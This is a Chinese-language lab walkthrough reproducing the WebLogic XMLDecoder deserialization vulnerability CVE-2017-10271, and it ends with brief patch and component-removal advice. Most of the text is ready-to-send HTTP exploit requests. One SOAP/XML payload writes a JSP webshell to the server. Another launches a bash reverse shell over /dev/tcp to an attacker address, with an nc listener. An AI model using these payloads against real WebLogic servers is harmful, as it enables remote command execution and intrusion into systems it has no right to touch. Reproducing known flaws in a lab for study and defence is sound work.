Weblogic XMLDecoder 反序列化漏洞
(CVE-2017-10271)检测与利用复现
原理
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
漏洞环境搭建
启动vulhub中的CVE-2017-10271
注意:复现过程基于同一台云主机,云主机内部靶场镜像开启CVE-2017-10271,文章内所有IP为同一个,请自行区分攻击方和受害方。
漏洞检测
漏洞利用
反弹shell,访问http://IP:7001/wls-wsat/CoordinatorPortType
Burp抓包传入数据验证
(1)尝试写入Webshell。打开漏洞地址,本次实例为:http://IP:7001/wls-wsat/CoordinatorPortType(上边的漏洞地址都可以试一下)。使用Burp抓包,将其转发到“Repeater”模块下,
抓到的包如下
(2)将GET变为POST,并复制Webshell,粘贴,替换里面的内容,点击Go按钮。
访问地址:
http://150.158.193.92:7001/bea_wls_internal/test.jsp
测试有结果,存在此漏洞。
webshell内容如下(注意修改GET为POST;Content-Type: application/x-www-form-urlencoded为Content-Type: text/xml):
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 150.158.193.92:7001
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml
Content-Length: 646
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><java version="1.4.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
<void method="println">
<string>
<![CDATA[
<% out.print("webshell"); %>
]]>
</string>
</void>
<void method="close"/>
</object></java></java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
反弹一个shell
(1)使用Burp抓包,将其转发到“Repeater”模块下,攻击机开始监听,nc -l -p 端口
(2)将GET变为POST,并将反弹shell数据(IP要修改为攻击机的IP)粘贴至此,在开始完监听端口后,点击Go,发送数据
在这里插入图片描述
(3)反弹成功!
(4)反弹shell内容如下:(注意修改GET为POST;Content-Type: application/x-www-form-urlencoded为Content-Type: text/xml)
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 150.158.193.92:7001
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml
Content-Length: 641
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://beas.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/your-IP/5678 0>&1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
漏洞防御
(1)临时解决方案 根据业务所有需求,考虑是否删除WLS-WebServices组件。包含此组件路径为:
Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat
Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war
Middleware/wlserver_10.3/server/lib/wls-wsat.war
以上路径都在WebLogic安装处。删除以上文件之后,需重启WebLogic。确认http://weblogic_ip/wls-wsat/ 是否为404页面。
(2)官方补丁修复 前往Oracle官网下载10月份所提供的安全补丁。